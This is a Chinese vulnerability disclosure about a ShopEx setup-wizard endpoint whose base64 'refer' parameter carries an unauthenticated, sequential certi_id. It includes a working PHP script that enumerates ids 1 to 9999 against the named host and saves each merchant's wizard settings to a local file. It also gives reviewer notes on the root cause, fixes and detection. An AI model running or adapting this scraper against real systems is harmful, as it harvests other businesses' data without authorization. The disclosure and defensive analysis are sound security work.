简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在 shopex 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer 参数 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站

<?php
// Driver from the report: walks certi_id 1..9999 and calls ShowshopExD()
// for each one. The ids are small sequential integers, which is what makes
// this enumeration feasible — see the notes on ShowshopExD().
for ($i=1; $i < 10000; $i++) { // iterate over candidate ids
    ShowshopExD($i);
}
/**
 * Fetch the ShopEx setup-wizard step2 page for one certificate id and dump
 * the pre-filled text-input fields it returns (stdout + c:/shopEx.txt).
 *
 * Security notes (reviewer):
 *  - The only thing identifying the caller in this request is `refer`, a
 *    base64-encoded JSON blob carrying `certi_id` and a caller-supplied
 *    `callback_url`. Base64 is an encoding, not encryption or a signature, so
 *    a valid `refer` can be built for any id. Nothing ties the id to an
 *    authenticated merchant: this is a missing-authorization / insecure
 *    direct object reference flaw rather than a weakness of the encoding.
 *  - A response is treated as a hit when it echoes `refer` back (strpos()
 *    below); the `<input type="text">` values it pre-fills appear to be that
 *    merchant's wizard settings. Server-side fix: bind certi_id to the
 *    requester's session, or sign the refer payload with a server-side key
 *    and verify it, and prefer non-sequential ids; per-source rate limiting
 *    on step2.php is a secondary control. Detection: one client requesting
 *    step2.php with many monotonically changing certi_id values.
 *
 * @param int|string $cid  certificate id; passed through intval() before use.
 * @return void
 */
function ShowshopExD($cid) {
    $url='http://guide.ecos.shopex.cn/step2.php';
    // JSON is hand-built; only the intval()'d id is interpolated into it.
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    $url = $url.'?refer='.$refer;
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
    $result = curl_exec($ch);
    // Re-encode to GB2312, presumably for display on a Chinese-locale console.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");
    // The page echoing our own refer value is taken as "this certi_id exists".
    // (A failed transfer or a non-matching page simply falls through.)
    if(strpos($result,$refer))
    {
        $fp = fopen("c:/shopEx.txt",'ab'); // save to file (append, binary)
        // Group 1 is the attribute tail of every <input type="text" .../> tag.
        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
        foreach ($value[1] as $key) {
            // Extract name="..." and value="..." from the attribute string;
            // assumes both attributes are present and in that order.
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
            echo $res[1][0].':'.$res[3][0]."\r\n";
            $col =$res[1][0].':'.$res[3][0]."\r\n";
            fwrite($fp, $col, strlen($col));
        }
        echo '--------------------------------'."\r\n";
        fclose($fp);
    }
    flush();
    curl_close($ch);
}
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式（注：仅更换编码或加密方式并不能修复该问题——refer 中的 certi_id 没有与请求者身份绑定，服务端需校验请求者对该 certi_id 的授权，例如将其绑定到登录会话，或用服务端密钥对 refer 载荷签名并校验。）